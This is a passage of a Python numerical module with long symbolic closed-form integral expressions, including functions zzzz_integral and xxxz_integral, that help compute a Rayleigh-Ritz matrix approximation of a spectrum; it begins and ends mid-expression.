- a * a_conj * (-1 + 6 * b + x ** 2)
)
/ np.sqrt(
(a * a_conj + b) ** 2 - 2 * (a * a_conj - b) * x ** 2 + x ** 4
)
- 24
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (7 / 2)
* (
a ** 2 * a_conj ** 2
+ b ** 2
- x ** 2
+ b * (-1 + x ** 2)
- a * a_conj * (-1 + 6 * b + x ** 2)
)
/ (
(1 + x ** 2) ** 3
* np.sqrt(
(a * a_conj + b) ** 2
- 2 * (a * a_conj - b) * x ** 2
+ x ** 4
)
)
+ 60
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (7 / 2)
* (
a ** 2 * a_conj ** 2
+ b ** 2
- x ** 2
+ b * (-1 + x ** 2)
- a * a_conj * (-1 + 6 * b + x ** 2)
)
/ (
(1 + x ** 2) ** 2
* np.sqrt(
(a * a_conj + b) ** 2
- 2 * (a * a_conj - b) * x ** 2
+ x ** 4
)
)
- 54
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (7 / 2)
* (
a ** 2 * a_conj ** 2
+ b ** 2
- x ** 2
+ b * (-1 + x ** 2)
- a * a_conj * (-1 + 6 * b + x ** 2)
)
/ (
(1 + x ** 2)
* np.sqrt(
(a * a_conj + b) ** 2
- 2 * (a * a_conj - b) * x ** 2
+ x ** 4
)
)
+ 648
* a
* a_conj
* (1 + a * a_conj - b)
* b
* (a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b))
** 2
* np.arctanh(
(
a ** 2 * a_conj ** 2
+ (-1 + b) * b
+ a * (a_conj + 2 * a_conj * b)
)
/ (
np.sqrt((a * a_conj + b) ** 2)
* np.sqrt(
a ** 2 * a_conj ** 2
+ (-1 + b) ** 2
+ 2 * a * a_conj * (1 + b)
)
)
)
- 84
* a
* a_conj
* b
* (a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b))
** 3
* np.arctanh(
(
a ** 2 * a_conj ** 2
+ (-1 + b) * b
+ a * (a_conj + 2 * a_conj * b)
)
/ (
np.sqrt((a * a_conj + b) ** 2)
* np.sqrt(
a ** 2 * a_conj ** 2
+ (-1 + b) ** 2
+ 2 * a * a_conj * (1 + b)
)
)
)
+ 960
* a
* a_conj
* b
* (
a ** 3 * a_conj ** 3
+ 3 * a ** 2 * a_conj ** 2 * (1 - 2 * b)
- (-1 + b) ** 3
+ 3 * a * a_conj * (1 - 3 * b + 2 * b ** 2)
)
* np.arctanh(
(
a ** 2 * a_conj ** 2
+ (-1 + b) * b
+ a * (a_conj + 2 * a_conj * b)
)
/ (
np.sqrt((a * a_conj + b) ** 2)
* np.sqrt(
a ** 2 * a_conj ** 2
+ (-1 + b) ** 2
+ 2 * a * a_conj * (1 + b)
)
)
)
+ 60
* (a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b))
* (
(
a ** 2 * a_conj ** 2
+ a * a_conj * (2 - 8 * b)
+ (-1 + b) ** 2
)
* np.sqrt((a * a_conj + b) ** 2)
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2)
** (3 / 2)
+ np.sqrt((a * a_conj + b) ** 2)
* np.sqrt(1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2)
* (
a ** 3 * a_conj ** 3
+ a ** 2 * a_conj ** 2 * (3 - 29 * b)
- (-1 + b) ** 3
+ a * a_conj * (3 - 32 * b + 29 * b ** 2)
)
- 24
* a
* a_conj
* (
a ** 2 * a_conj ** 2
+ a * a_conj * (2 - 3 * b)
+ (-1 + b) ** 2
)
* b
* np.arctanh(
(
a ** 2 * a_conj ** 2
+ (-1 + b) * b
+ a * (a_conj + 2 * a_conj * b)
)
/ (
np.sqrt((a * a_conj + b) ** 2)
* np.sqrt(
a ** 2 * a_conj ** 2
+ (-1 + b) ** 2
+ 2 * a * a_conj * (1 + b)
)
)
)
)
+ 84
* a
* a_conj
* b
* (a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b))
** 3
* np.arctanh(
(
a ** 2 * a_conj ** 2
+ b ** 2
- x ** 2
+ a * a_conj * (1 + 2 * b - x ** 2)
+ b * (-1 + x ** 2)
)
/ (
np.sqrt(
a ** 2 * a_conj ** 2
+ (-1 + b) ** 2
+ 2 * a * a_conj * (1 + b)
)
* np.sqrt(
(a * a_conj + b) ** 2
- 2 * (a * a_conj - b) * x ** 2
+ x ** 4
)
)
)
- 648
* a
* a_conj
* (1 + a * a_conj - b)
* b
* (a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b))
** 2
* np.arctanh(
(
a ** 2 * a_conj ** 2
+ b ** 2
- x ** 2
+ a * a_conj * (1 + 2 * b - x ** 2)
+ b * (-1 + x ** 2)
)
/ (
np.sqrt(
a ** 2 * a_conj ** 2
+ (-1 + b) ** 2
+ 2 * a * a_conj * (1 + b)
)
* np.sqrt(
a ** 2 * a_conj ** 2
+ 2 * a * a_conj * (b - x ** 2)
+ (b + x ** 2) ** 2
)
)
)
- 960
* a
* a_conj
* b
* (
a ** 3 * a_conj ** 3
+ 3 * a ** 2 * a_conj ** 2 * (1 - 2 * b)
- (-1 + b) ** 3
+ 3 * a * a_conj * (1 - 3 * b + 2 * b ** 2)
)
* np.arctanh(
(
a ** 2 * a_conj ** 2
+ b ** 2
- x ** 2
+ a * a_conj * (1 + 2 * b - x ** 2)
+ b * (-1 + x ** 2)
)
/ (
np.sqrt(
a ** 2 * a_conj ** 2
+ (-1 + b) ** 2
+ 2 * a * a_conj * (1 + b)
)
* np.sqrt(
a ** 2 * a_conj ** 2
+ 2 * a * a_conj * (b - x ** 2)
+ (b + x ** 2) ** 2
)
)
)
- 1
/ (1 + x ** 2) ** 2
* (
60
* (
a ** 2 * a_conj ** 2
+ (-1 + b) ** 2
+ 2 * a * a_conj * (1 + b)
)
* (
(
a ** 2 * a_conj ** 2
+ a * a_conj * (2 - 8 * b)
+ (-1 + b) ** 2
)
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2)
** (3 / 2)
* np.sqrt(
(a * a_conj + b) ** 2
- 2 * (a * a_conj - b) * x ** 2
+ x ** 4
)
+ np.sqrt(
1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2
)
* (
a ** 3 * a_conj ** 3
+ a ** 2 * a_conj ** 2 * (3 - 29 * b)
- (-1 + b) ** 3
+ a * a_conj * (3 - 32 * b + 29 * b ** 2)
)
* (1 + x ** 2)
* np.sqrt(
(a * a_conj + b) ** 2
- 2 * (a * a_conj - b) * x ** 2
+ x ** 4
)
- 24
* a
* a_conj
* (
a ** 2 * a_conj ** 2
+ a * a_conj * (2 - 3 * b)
+ (-1 + b) ** 2
)
* b
* (1 + x ** 2) ** 2
* np.arctanh(
(
a ** 2 * a_conj ** 2
+ b ** 2
- x ** 2
+ a * a_conj * (1 + 2 * b - x ** 2)
+ b * (-1 + x ** 2)
)
/ (
np.sqrt(
a ** 2 * a_conj ** 2
+ (-1 + b) ** 2
+ 2 * a * a_conj * (1 + b)
)
* np.sqrt(
a ** 2 * a_conj ** 2
+ 2 * a * a_conj * (b - x ** 2)
+ (b + x ** 2) ** 2
)
)
)
)
)
)
)
)
return -2 * np.pi * c * ret
if abs(a_conj) < 0.00000001:
ret = 0
return ret
def zzzz_integral(a, b, c, x):
"""
function involved in computing the a_matrix (Rayleigh Ritz approx of the spectrum)
@param a:
@param b:
@param c:
@param x:
@return:
"""
a_conj = np.conj(a)
if abs(a_conj) >= 0.00000001:
ret = (
1
/ (
12
* b
* (a * a_conj + b)
* (a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b)) ** 4
)
* (
np.sqrt((a * a_conj + b) ** 2)
* (
3 * a ** 8 * a_conj ** 8
+ 24 * a ** 7 * a_conj ** 7 * b
+ 4 * a ** 6 * a_conj ** 6 * (-3 + 32 * b + 21 * b ** 2)
+ 8 * a ** 5 * a_conj ** 5 * b * (-95 + 96 * b + 21 * b ** 2)
+ 8
* a ** 3
* a_conj ** 3
* b
* (173 - 432 * b - 570 * b ** 2 + 320 * b ** 3 + 21 * b ** 4)
+ 2
* a ** 4
* a_conj ** 4
* (9 - 232 * b - 1490 * b ** 2 + 960 * b ** 3 + 105 * b ** 4)
+ (-1 + b) ** 3
* (
-3
+ 39 * b
+ 282 * b ** 2
+ 342 * b ** 3
+ 137 * b ** 4
+ 3 * b ** 5
)
+ 8
* a
* a_conj
* b
* (
-57
+ 216 * b
+ 261 * b ** 2
- 400 * b ** 3
- 119 * b ** 4
+ 96 * b ** 5
+ 3 * b ** 6
)
+ 4
* a ** 2
* a_conj ** 2
* (
-3
+ 144 * b
+ 1035 * b ** 2
- 1464 * b ** 3
- 805 * b ** 4
+ 480 * b ** 5
+ 21 * b ** 6
)
)
)
- 1
/ (
12
* (a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b)) ** 4
)
* (
np.sqrt(
(a * a_conj + b) ** 2
- 2 * a * a_conj * x ** 2
+ 2 * b * x ** 2
+ x ** 4
)
* (
32
* (-1 + a * a_conj + b)
* (a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b))
** 2
/ (1 + x ** 2) ** 3
- 32
* (a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b))
* (
3 * a ** 3 * a_conj ** 3
+ (-1 + b) ** 2 * (1 + 3 * b)
+ a ** 2 * a_conj ** 2 * (-4 + 9 * b)
+ 3 * a * a_conj * (-2 - 3 * b + 3 * b ** 2)
)
/ (1 + x ** 2) ** 2
+ 16
* (
9 * a ** 5 * a_conj ** 5
+ 9 * a ** 4 * a_conj ** 4 * (-3 + 5 * b)
+ (-1 + b) ** 3 * (5 + 12 * b + 9 * b ** 2)
+ 2 * a ** 3 * a_conj ** 3 * (-23 - 48 * b + 45 * b ** 2)
+ 2
* a ** 2
* a_conj ** 2
* (10 - 66 * b - 63 * b ** 2 + 45 * b ** 3)
+ a
* a_conj
* (25 + 92 * b - 90 * b ** 2 - 72 * b ** 3 + 45 * b ** 4)
)
/ (1 + x ** 2)
+ 1
/ (
b
* (
a ** 2 * a_conj ** 2
+ 2 * a * a_conj * (b - x ** 2)
+ (b + x ** 2) ** 2
)
)
* (
3
* (
a ** 9 * a_conj ** 9
+ a ** 8 * a_conj ** 8 * (9 * b - x ** 2)
+ 4
* a ** 7
* a_conj ** 7
* (-1 + 9 * b ** 2 - 2 * b * (-2 + x ** 2))
+ 4
* a ** 6
* a_conj ** 6
* (
21 * b ** 3
+ x ** 2
- 7 * b ** 2 * (-4 + x ** 2)
+ b * (-31 + 4 * x ** 2)
)
+ 2
* a ** 5
* a_conj ** 5
* (
3
+ 63 * b ** 4
- 28 * b ** 3 * (-6 + x ** 2)
+ 12 * b * (-2 + 5 * x ** 2)
+ 6 * b ** 2 * (-47 + 8 * x ** 2)
)
+ (-1 + b ** 2) ** 3
* (
b ** 3
+ x ** 2
- b ** 2 * (-16 + x ** 2)
+ b * (-1 + 16 * x ** 2)
)
+ 4
* a ** 2
* a_conj ** 2
* (
9 * b ** 7
+ x ** 2
+ b ** 3 * (223 - 200 * x ** 2)
+ b ** 2 * (100 - 169 * x ** 2)
- 7 * b ** 6 * (-12 + x ** 2)
+ 3 * b * (-9 + 4 * x ** 2)
+ 3 * b ** 5 * (-47 + 20 * x ** 2)
+ 3 * b ** 4 * (-104 + 37 * x ** 2)
)
+ 4
* a ** 3
* a_conj ** 3
* (
-1
+ 21 * b ** 6
+ b ** 2 * (223 - 112 * x ** 2)
- 14 * b ** 5 * (-10 + x ** 2)
- 6 * b * (-2 + 9 * x ** 2)
+ 5 * b ** 4 * (-55 + 16 * x ** 2)
+ 4 * b ** 3 * (-78 + 41 * x ** 2)
)
+ a
* a_conj
* (-1 + b ** 2)
* (
-1
+ 9 * b ** 6
+ b ** 2 * (107 - 352 * x ** 2)
- 8 * b ** 5 * (-14 + x ** 2)
+ 16 * b ** 3 * (-24 + 7 * x ** 2)
- 8 * b * (-2 + 13 * x ** 2)
+ b ** 4 * (-115 + 96 * x ** 2)
)
+ 2
* a ** 4
* a_conj ** 4
* (
63 * b ** 5
- 3 * x ** 2
- 35 * b ** 4 * (-8 + x ** 2)
- 3 * b * (-37 + 8 * x ** 2)
+ 10 * b ** 3 * (-55 + 12 * x ** 2)
+ b ** 2 * (-248 + 222 * x ** 2)
)
)
)
)
)
- 4
* (1 + a * a_conj + b)
* (
a ** 6 * a_conj ** 6
+ (-1 + b) ** 4 * (1 + b) ** 2
+ 2 * a ** 5 * a_conj ** 5 * (-4 + 3 * b)
+ a ** 4 * a_conj ** 4 * (-1 - 34 * b + 15 * b ** 2)
+ 2
* a
* a_conj
* (-1 + b) ** 2
* (-4 - 21 * b - 2 * b ** 2 + 3 * b ** 3)
+ 4 * a ** 3 * a_conj ** 3 * (4 - 7 * b - 14 * b ** 2 + 5 * b ** 3)
+ a ** 2
* a_conj ** 2
* (-1 + 108 * b - 54 * b ** 2 - 44 * b ** 3 + 15 * b ** 4)
)
* np.log(
a * a_conj
- b
+ (a * a_conj + b) ** 2
+ np.sqrt((a * a_conj + b) ** 2)
* np.sqrt(1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2)
)
/ (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (9 / 2)
- 4
* (1 + a * a_conj + b)
* (
a ** 6 * a_conj ** 6
+ (-1 + b) ** 4 * (1 + b) ** 2
+ 2 * a ** 5 * a_conj ** 5 * (-4 + 3 * b)
+ a ** 4 * a_conj ** 4 * (-1 - 34 * b + 15 * b ** 2)
+ 2
* a
* a_conj
* (-1 + b) ** 2
* (-4 - 21 * b - 2 * b ** 2 + 3 * b ** 3)
+ 4 * a ** 3 * a_conj ** 3 * (4 - 7 * b - 14 * b ** 2 + 5 * b ** 3)
+ a ** 2
* a_conj ** 2
* (-1 + 108 * b - 54 * b ** 2 - 44 * b ** 3 + 15 * b ** 4)
)
* np.log(1 + x ** 2)
/ (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (9 / 2)
+ 1
/ (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (9 / 2)
* (
4
* (1 + a * a_conj + b)
* (
a ** 6 * a_conj ** 6
+ (-1 + b) ** 4 * (1 + b) ** 2
+ 2 * a ** 5 * a_conj ** 5 * (-4 + 3 * b)
+ a ** 4 * a_conj ** 4 * (-1 - 34 * b + 15 * b ** 2)
+ 2
* a
* a_conj
* (-1 + b) ** 2
* (-4 - 21 * b - 2 * b ** 2 + 3 * b ** 3)
+ 4 * a ** 3 * a_conj ** 3 * (4 - 7 * b - 14 * b ** 2 + 5 * b ** 3)
+ a ** 2
* a_conj ** 2
* (-1 + 108 * b - 54 * b ** 2 - 44 * b ** 3 + 15 * b ** 4)
)
* np.log(
a ** 2 * a_conj ** 2
- b
+ b ** 2
- x ** 2
+ b * x ** 2
+ a * a_conj * (1 + 2 * b - x ** 2)
+ np.sqrt(
a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b)
)
* np.sqrt(
a ** 2 * a_conj ** 2
+ 2 * a * a_conj * (b - x ** 2)
+ (b + x ** 2) ** 2
)
)
)
)
return 4 * np.pi * c * ret
if abs(a_conj) < 0.00000001 and (b - 1) ** 2 >= 0.00000001:
ret = (
16 * (-1 + b) ** 3
- 48 * (-1 + b) ** 2 * b
+ 3 * (-1 + b) * (1 + b) ** 4 / b
+ 24 * (-1 + b) * (1 + 2 * b + 3 * b ** 2)
- 16 * (-1 + b) ** 3 / (1 + x ** 2) ** 3
+ 48 * (-1 + b) ** 2 * b / (1 + x ** 2) ** 2
- 24 * (-1 + b) * (1 + 2 * b + 3 * b ** 2) / (1 + x ** 2)
- 3 * (-1 + b) * (1 + b) ** 4 / (b + x ** 2)
- 24 * (1 + b) ** 3 * np.log(b)
+ 24 * (1 + b) ** 3 * np.log(b + x ** 2)
- 24 * (1 + b) ** 3 * np.log(1 + x ** 2)
) / (6 * (-1 + b) ** 5)
return 4 * c * np.pi * ret
if abs(a_conj) < 0.00000001 and (b - 1) ** 2 < 0.00000001:
ret = x ** 2 * (x ** 8 + 10 * x ** 4 + 5) / (10 * (x ** 2 + 1) ** 5)
return 4 * c * np.pi * ret
def xxxz_integral(a, b, c, x):
"""
function involved in computing the a_matrix (Rayleigh Ritz approx of the spectrum)
@param a:
@param b:
@param c:
@param x:
@return:
"""
a_conj = np.conj(a)
if abs(a_conj) >= 0.00000001:
ret = (
1
/ 12
* (a + a_conj)
* (
-(6 * (a ** 2 - a * a_conj + a_conj ** 2) / (a ** 3 * a_conj ** 3))
- 3
* (a ** 2 - a * a_conj + a_conj ** 2)
* (-3 + a * a_conj + b)
/ (a ** 3 * a_conj ** 3)
+ 4
* (a ** 2 - a * a_conj + a_conj ** 2)
* (-1 + a * a_conj + b)
/ (a ** 3 * a_conj ** 3)
- 1
/ (
a ** 3
* a_conj ** 3
* b
* (a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b))
** 4
)
* (
np.sqrt((a * a_conj + b) ** 2)
* (
a ** 10 * a_conj ** 8 * b
+ a_conj ** 2 * (-3 + b) * (-1 + b) ** 6 * b ** 2
+ a ** 9
* a_conj ** 7
* (3 - (-7 + a_conj ** 2) * b + 8 * b ** 2)
+ a ** 8
* a_conj ** 6
* (
9
+ 23 * b
+ a_conj ** 4 * b
+ 33 * b ** 2
+ 28 * b ** 3
+ a_conj ** 2 * (6 - 7 * b - 8 * b ** 2)
)
- a
* a_conj
* (-3 + b)
* (-1 + b) ** 4
* b
* ((-1 + b) ** 2 * b - a_conj ** 2 * (2 + 9 * b + 8 * b ** 2))
+ a ** 7
* a_conj ** 5
* (
6
+ 298 * b
+ 13 * b ** 2
+ 51 * b ** 3
+ 56 * b ** 4
+ a_conj ** 4 * (3 + 7 * b + 8 * b ** 2)
- a_conj ** 2 * (-18 + 119 * b + 33 * b ** 2 + 28 * b ** 3)
)
+ a ** 6
* a_conj ** 4
* (
-6
+ 473 * b
+ 419 * b ** 2
- 85 * b ** 3
+ 5 * b ** 4
+ 70 * b ** 5
+ a_conj ** 4 * (9 + 23 * b + 33 * b ** 2 + 28 * b ** 3)
+ a_conj ** 2
* (12 + 113 * b - 478 * b ** 2 - 51 * b ** 3 - 56 * b ** 4)
)
+ a ** 2
* (
(-3 + b) * (-1 + b) ** 6 * b ** 2
- a_conj ** 2
* (-1 + b) ** 4
* b
* (-15 - 34 * b - 15 * b ** 2 + 8 * b ** 3)
+ a_conj ** 4
* (-1 + b) ** 2
* (
-3
- 95 * b
- 152 * b ** 2
- 89 * b ** 3
- 37 * b ** 4
+ 28 * b ** 5
)
)
+ a ** 5
* a_conj ** 3
* (
-9
+ 109 * b
+ 720 * b ** 2
+ 82 * b ** 3
- 115 * b ** 4
- 75 * b ** 5
+ 56 * b ** 6
+ a_conj ** 4
* (6 + 298 * b + 13 * b ** 2 + 51 * b ** 3 + 56 * b ** 4)
- a_conj ** 2
* (
12
- 349 * b
+ 35 * b ** 2
+ 635 * b ** 3
+ 5 * b ** 4
+ 70 * b ** 5
)
)
+ a ** 3
* (
a_conj
* (-1 + b) ** 4
* b
* (-6 - 25 * b - 15 * b ** 2 + 8 * b ** 3)
- a_conj ** 3
* (-1 + b) ** 2
* (
6
+ 193 * b
+ 451 * b ** 2
+ 7 * b ** 3
- 37 * b ** 4
+ 28 * b ** 5
)
+ a_conj ** 5
* (
-9
+ 109 * b
+ 720 * b ** 2
+ 82 * b ** 3
- 115 * b ** 4
- 75 * b ** 5
+ 56 * b ** 6
)
)
+ a ** 4
* (
a_conj ** 2
* (-1 + b) ** 2
* (
-3
- 95 * b
- 152 * b ** 2
- 89 * b ** 3
- 37 * b ** 4
+ 28 * b ** 5
)
+ a_conj ** 6
* (
-6
+ 473 * b
+ 419 * b ** 2
- 85 * b ** 3
+ 5 * b ** 4
+ 70 * b ** 5
)
- a_conj ** 4
* (
18
+ 73 * b
- 888 * b ** 2
+ 466 * b ** 3
+ 350 * b ** 4
- 75 * b ** 5
+ 56 * b ** 6
)
)
)
)
- 4
* (a ** 2 - a * a_conj + a_conj ** 2)
* (-1 + a * a_conj + b)
/ (a ** 3 * a_conj ** 3 * (1 + x ** 2) ** 3)
+ 3
* (a ** 2 - a * a_conj + a_conj ** 2)
* (-3 + a * a_conj + b)
/ (a ** 3 * a_conj ** 3 * (1 + x ** 2) ** 2)
+ 6
* (a ** 2 - a * a_conj + a_conj ** 2)
/ (a ** 3 * a_conj ** 3 * (1 + x ** 2))
+ 1
/ (
a ** 3
* a_conj ** 3
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** 4
)
* (
np.sqrt(
(a * a_conj + b) ** 2
- 2 * a * a_conj * x ** 2
+ 2 * b * x ** 2
+ x ** 4
)
* (
1
/ (1 + x ** 2) ** 3
* (
4
* (
a ** 2 * a_conj ** 2
+ (-1 + b) ** 2
+ 2 * a * a_conj * (1 + b)
)
** 2
* (
a ** 6 * a_conj ** 4
+ a_conj ** 2 * (-1 + b) ** 4
+ a ** 5 * a_conj ** 3 * (2 - a_conj ** 2 + 4 * b)
+ a ** 4
* (
a_conj ** 6
+ 6 * a_conj ** 2 * b ** 2
- 2 * a_conj ** 4 * (1 + 2 * b)
)
+ a ** 2
* (
(-1 + b) ** 4
+ 6 * a_conj ** 4 * b ** 2
- 2 * a_conj ** 2 * (-1 + b) ** 2 * (1 + 2 * b)
)
+ a
* (
-a_conj * (-1 + b) ** 4
+ a_conj ** 3 * (-1 + b) ** 2 * (2 + 4 * b)
)
+ 2
* a ** 3
* (
a_conj ** 5 * (1 + 2 * b)
+ a_conj * (-1 + b) ** 2 * (1 + 2 * b)
- 3 * a_conj ** 3 * (1 + b ** 2)
)
)
)
- 1
/ (1 + x ** 2) ** 2
* (
(
a ** 2 * a_conj ** 2
+ (-1 + b) ** 2
+ 2 * a * a_conj * (1 + b)
)
* (
3 * a ** 8 * a_conj ** 6
+ a_conj ** 2 * (-1 + b) ** 5 * (-5 + 3 * b)
+ a ** 7 * a_conj ** 5 * (2 - 3 * a_conj ** 2 + 18 * b)
+ a
* (
-a_conj * (-1 + b) ** 5 * (-5 + 3 * b)
+ 6
* a_conj ** 3
* (-1 + b) ** 3
* (-5 - 4 * b + 3 * b ** 2)
)
+ a ** 6
* (
3 * a_conj ** 8
- 2 * a_conj ** 6 * (1 + 9 * b)
+ 3 * a_conj ** 4 * (-9 - 4 * b + 15 * b ** 2)
)
+ a ** 5
* a_conj ** 3
* (
16
- 68 * b
- 68 * b ** 2
+ 60 * b ** 3
+ 2 * a_conj ** 4 * (1 + 9 * b)
- 3 * a_conj ** 2 * (21 - 4 * b + 15 * b ** 2)
)
+ a ** 4
* a_conj ** 2
* (
67
- 112 * b ** 3
+ 45 * b ** 4
+ 3 * a_conj ** 4 * (-9 - 4 * b + 15 * b ** 2)
- 4
* a_conj ** 2
* (16 + 28 * b - 17 * b ** 2 + 15 * b ** 3)
)
+ a ** 3
* (
6
* a_conj
* (-1 + b) ** 3
* (-5 - 4 * b + 3 * b ** 2)
+ 4
* a_conj ** 5
* (4 - 17 * b - 17 * b ** 2 + 15 * b ** 3)
+ a_conj ** 3
* (
-25
+ 48 * b
- 90 * b ** 2
+ 112 * b ** 3
- 45 * b ** 4
)
)
+ a ** 2
* (
(-1 + b) ** 5 * (-5 + 3 * b)
- 6
* a_conj ** 2
* (-1 + b) ** 3
* (-5 - 4 * b + 3 * b ** 2)
+ a_conj ** 4 * (67 - 112 * b ** 3 + 45 * b ** 4)
)
)
)
+ 1
/ (1 + x ** 2)
* (
-9 * a ** 9 * a_conj ** 7
+ a ** 8 * a_conj ** 6 * (-47 + 9 * a_conj ** 2 - 57 * b)
+ a * a_conj * (-1 + b) ** 6 * (-1 + 3 * b)
- a_conj ** 2 * (-1 + b) ** 6 * (-1 + 3 * b)
- a
* a_conj ** 3
* (-1 + b) ** 4
* (-7 + 24 * b + 27 * b ** 2)
- a ** 7
* a_conj ** 5
* (
-115
+ 9 * a_conj ** 4
+ a_conj ** 2 * (97 - 57 * b)
+ 180 * b
+ 153 * b ** 2
)
- a ** 6
* a_conj ** 4
* (
-353
- 259 * b
+ 231 * b ** 2
+ 225 * b ** 3
+ a_conj ** 4 * (47 + 57 * b)
+ a_conj ** 2 * (61 + 396 * b - 153 * b ** 2)
)
+ a ** 2
* (
-((-1 + b) ** 6) * (-1 + 3 * b)
+ a_conj ** 2
* (-1 + b) ** 4
* (-7 + 24 * b + 27 * b ** 2)
- a_conj ** 4
* (-1 + b) ** 2
* (-29 + 35 * b + 99 * b ** 2 + 99 * b ** 3)
)
+ a ** 5
* a_conj ** 3
* (
223
+ 492 * b
+ 216 * b ** 2
- 64 * b ** 3
- 195 * b ** 4
+ a_conj ** 4 * (115 - 180 * b - 153 * b ** 2)
+ a_conj ** 2
* (109 - 205 * b - 633 * b ** 2 + 225 * b ** 3)
)
+ a ** 4
* a_conj ** 2
* (
29
- 93 * b
+ 64 * b ** 3
+ 99 * b ** 4
- 99 * b ** 5
+ a_conj ** 4
* (353 + 259 * b - 231 * b ** 2 - 225 * b ** 3)
+ a_conj ** 2
* (
-37
+ 432 * b
- 270 * b ** 2
- 512 * b ** 3
+ 195 * b ** 4
)
)
- a ** 3
* (
a_conj * (-1 + b) ** 4 * (-7 + 24 * b + 27 * b ** 2)
- a_conj ** 3
* (-1 + b) ** 2
* (-107 - 307 * b - 45 * b ** 2 + 99 * b ** 3)
+ a_conj ** 5
* (
-223
- 492 * b
- 216 * b ** 2
+ 64 * b ** 3
+ 195 * b ** 4
)
)
)
+ 1
/ (
b
* (
a ** 2 * a_conj ** 2
+ 2 * a * a_conj * (b - x ** 2)
+ (b + x ** 2) ** 2
)
)
* (
3
* a
* a_conj
* (a + a_conj) ** 2
* (
a ** 8 * a_conj ** 8
- a ** 7 * a_conj ** 7 * (-3 + x ** 2)
+ (-1 + b) ** 4 * b ** 2 * (1 + b) * (b + x ** 2)
+ a ** 6
* a_conj ** 6
* (2 - 20 * b ** 2 - 3 * x ** 2 + b * (31 - 5 * x ** 2))
+ a
* a_conj
* (-1 + b) ** 2
* b
* (
b
- 6 * x ** 2
- 31 * b * x ** 2
+ b ** 3 * (-31 + 5 * x ** 2)
- 2 * b ** 2 * (9 + 8 * x ** 2)
)
- a ** 5
* a_conj ** 5
* (
64 * b ** 3
+ 2 * (1 + x ** 2)
+ b ** 2 * (-75 + 9 * x ** 2)
+ b * (-44 + 26 * x ** 2)
)
- a ** 3
* a_conj ** 3
* (
1
+ 64 * b ** 5
- 3 * x ** 2
+ b * (20 - 40 * x ** 2)
+ b ** 4 * (47 - 5 * x ** 2)
+ 4 * b ** 2 * (1 + x ** 2)
+ 4 * b ** 3 * (-58 + 27 * x ** 2)
)
+ a ** 2
* a_conj ** 2
* (
-20 * b ** 6
+ x ** 2
+ b ** 4 * (158 - 77 * x ** 2)
+ 4 * b ** 3 * (1 + x ** 2)
+ b ** 5 * (-75 + 9 * x ** 2)
+ b * (-1 + 19 * x ** 2)
+ b ** 2 * (-34 + 76 * x ** 2)
)
- a ** 4
* a_conj ** 4
* (
3
+ 90 * b ** 4
- 2 * x ** 2
+ 6 * b * (1 + x ** 2)
+ b ** 3 * (-47 + 5 * x ** 2)
+ b ** 2 * (-158 + 77 * x ** 2)
)
)
)
)
)
- 1
/ (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (9 / 2)
* (
12
* (-1 + a * a_conj + b)
* (1 + a * a_conj + b)
* (
a ** 4 * a_conj ** 2 * (-10 + 3 * a_conj ** 2)
- 10 * a_conj ** 2 * (1 + 5 * b + b ** 2)
+ 3 * (-1 + b) ** 2 * (1 + 8 * b + b ** 2)
- 4
* a
* a_conj
* (
2
+ 13 * b
- 7 * b ** 2
- 3 * b ** 3
+ 5 * a_conj ** 2 * (1 + b)
)
+ 4
* a ** 3
* (-5 * a_conj * (1 + b) + a_conj ** 3 * (-2 + 3 * b))
- 2
* a ** 2
* (
5 * a_conj ** 4
+ 5 * (1 + 5 * b + b ** 2)
- a_conj ** 2 * (-11 + b + 9 * b ** 2)
)
)
* np.log(
a * a_conj
- b
+ (a * a_conj + b) ** 2
+ np.sqrt((a * a_conj + b) ** 2)
* np.sqrt(1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2)
)
)
- 1
/ (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (9 / 2)
* (
12
* (-1 + a * a_conj + b)
* (1 + a * a_conj + b)
* (
a ** 4 * a_conj ** 2 * (-10 + 3 * a_conj ** 2)
- 10 * a_conj ** 2 * (1 + 5 * b + b ** 2)
+ 3 * (-1 + b) ** 2 * (1 + 8 * b + b ** 2)
- 4
* a
* a_conj
* (
2
+ 13 * b
- 7 * b ** 2
- 3 * b ** 3
+ 5 * a_conj ** 2 * (1 + b)
)
+ 4
* a ** 3
* (-5 * a_conj * (1 + b) + a_conj ** 3 * (-2 + 3 * b))
- 2
* a ** 2
* (
5 * a_conj ** 4
+ 5 * (1 + 5 * b + b ** 2)
- a_conj ** 2 * (-11 + b + 9 * b ** 2)
)
)
* np.log(1 + x ** 2)
)
+ 1
/ (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (9 / 2)
* (
12
* (-1 + a * a_conj + b)
* (1 + a * a_conj + b)
* (
a ** 4 * a_conj ** 2 * (-10 + 3 * a_conj ** 2)
